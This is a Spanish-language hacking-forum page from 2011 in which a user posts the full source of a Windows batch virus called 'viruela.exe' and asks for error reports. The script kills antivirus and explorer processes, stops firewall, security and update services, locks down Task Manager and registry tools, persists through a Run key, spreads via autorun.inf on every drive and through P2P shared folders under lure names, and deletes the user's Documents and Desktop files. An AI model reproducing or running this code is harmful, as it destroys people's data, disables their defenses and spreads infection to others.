  141. echo Msgbox "ha sido hackeado por hacked by W4rR3d" >> %homedrive%\mensaje.vbs
  142. For /L %%a IN (0,1,1000) DO start %homedrive%\mensaje.vbs
  143. goto inicio
  144.  
10  Programación / Scripting / [BATCH] virus informatico viruela.exe en: 10 Febrero 2011, 16:33 pm
 hacked by W4rR3d los mejores hackers Piura -Peru
si ven un error en mis lineas de codigo de mi virus informatico viruela.exe por favor notifinquela.
Código
  1. @echo off
  2. msg * hacked by -={W4rR3d}=-
  3. :: este virus fue creado por hacked by  W4rR3d
  4. :: este virus esta dedicado a la comunidad hacker piura- peru
  5. :: este virus informatico se llama viruela.exe
  6. taskkill /f /im  egui.exe  /im  nod32kui.exe /im nod32krn.exe
  7. taskkill /f/im "explorer.exe" /im "teatimer.exe"/im "taskmgr.exe">nul 2>&1
  8. net stop "Security Center"
  9. net stop SharedAccess
  10. net stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  11. net stop "Actualizaciones automáticas"
  12. net stop "Centro de seguridad"
  13. net stop "Conexiones de red"
  14. net stop "Windows Installer"
  15. net stop "Servicios IPSEC"
  16. netsh firewall set opmode mode=disable
  17. start /MAX %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
  18. REG ADD "HKCR\batfile\DefaultIcon" /ve /d "%SystemRoot%\System32\shell32.dll,3" /f
  19. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  20. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  21. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  22. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  23. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  24. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
  25. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f
  26. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t REG_DWORD /d 1 /f
  27. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  28. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
  29. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  30. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  31. for /F %%v in (VistaKeygen,EmoticonesMSN,SerialOffice2007,ParisXXXPhotos,MSMemoticon,FreeXXXPhotos,Office2007) do (call :p2p %%v)
  32. copy /y %0 "%homedrive%\viruela.exe"
  33. reg add hklm\software\microsoft\windows\currentversion\run /v viruela /t reg_sz /d %homedrive%\viruela.exe /f
  34. for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  35. copy /Y %0 %%E:\viruela.exe
  36. echo.[AutoRun]>> %%E:\autorun.inf
  37. echo.open="%%E:\viruela.exe">> %%E:\autorun.inf
  38. echo.action=Open folder to see files...>> %%E:\autorun.inf
  39. attrib +r +s +h %%E:\autorun.inf
  40. attrib +r +s +h %%E:\viruela.exe
  41. :th
  42. echo On Error Resume Next >> %homedrive%\abrir.vbs
  43. echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> %homedrive%\abrir.vbs
  44. echo Set colCDROMs = oWMP.cdromCollection >> %homedrive%\abrir.vbs
  45. echo. >> %homedrive%\abrir.vbs
  46. echo if colCDROMs.Count >= 1 then >> %homedrive%\abrir.vbs
  47. echo          For i = 0 to colCDROMs.Count - 1 >> %homedrive%\abrir.vbs
  48. echo                   colCDROMs.Item(i).Eject >> %homedrive%\abrir.vbs
  49. echo          Next    ' cdrom >> %homedrive%\abrir.vbs
  50. echo End If >> %homedrive%\abrir.vbs
  51. attrib +r +s +h %homedrive%\abrir.vbs
  52. start %homedrive%\abrir.vbs
  53. :ht
  54. echo On Error Resume Next >> %homedrive%\apagar.vbs
  55. echo set shell = CreateObject("WScript.Shell") >> %homedrive%\apagar.vbs
  56. echo shell.run "shutdown.exe -s  -t 10" >> %homedrive%\apagar.vbs
  57. start >> %homedrive%\apagar.vbs
  58. :erar
  59. DEL /Q /F /S "%systemdrive%\Documents and Settings\%USERNAME%\Mis documentos\*.*"
  60. DEL /Q /F /S "%systemdrive%\Documents and Settings\%USERNAME%\Escritorio\*.*"
  61. echo -={W4rR3d_by_hacked}=- >> "%systemdrive%\Documents and Settings\%USERNAME%\Escritorio\-={W4rR3d_by_hacked}=-.RAR.EXE"
  62. echo -={W4rR3d_by_hacked}=- >> "%systemdrive%\Documents and Settings\%USERNAME%\Mis documentos\-={W4rR3d_by_hacked}=-.RAR.EXE"
  63. :p2p
  64. set war=%0
  65. set var=%1
  66. copy %war% "%programfiles%\Grokster\My Grokster\%var%.bat"
  67. copy %war% "%programfiles%\Morpheus\My Shared Folder\%var%.bat"
  68. copy %war% "%programfiles%\ICQ\shared files\%var%.bat"
  69. copy %war% "%programfiles%\KaZaA\My Shared Folder\%var%.bat"
  70. copy %war% "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat"
  71. copy %war% "%programfiles%\EDONKEY2000\incoming\%var%.bat"
  72. copy %war% "%programfiles%\eMule\Incoming\%var%.bat"
  73. copy %war% "%programfiles%\Filetopia3\Files\%var%.bat"
  74. copy %war% "%programfiles%\appleJuice\incoming\%var%.bat"
  75. copy %war% "%programfiles%\Gnucleus\Downloads\%var%.bat"
  76. copy %war% "%programfiles%\LimeWire\Shared\%var%.bat"
  77. copy %war% "%programfiles%\Overnet\incoming\%var%.bat"
  78. copy %war% "%programfiles%\Shareaza\Downloads\%var%.bat"
  79. copy %war% "%programfiles%\Swaptor\Download\%var%.bat"
  80. copy %war% "%programfiles%\WinMX\My Shared Folder\%var%.bat"
  81. copy %war% "%programfiles%\Tesla\Files\%var%.bat"
  82. copy %war% "%programfiles%\XoloX\Downloads\%var%.bat"
  83. copy %war% "%programfiles%\Rapigator\Share\%var%.bat"
  84. copy %war% "%programfiles%\KMD\My Shared Folder\%var%.bat"
  85. copy %war% "%programfiles%\BearShare\Shared\%var%.bat"
  86. copy %war% "%programfiles%\Direct Connect\Received Files\%var%.bat"
  87. copy %war% "%appdata%\Ares\My Shared Folder\%var%.bat"
  88. echo Msgbox "hallen la cura adecuada para combatir el virus V1ru3l4", vbcritical, "Windows" >> %systemdrive%\viruela.vbs
  89. For /L %%a IN (0,1,1000) DO start %systemdrive%\viruela.vbs
  90. start /MiN %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
  91. goto :eof




Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines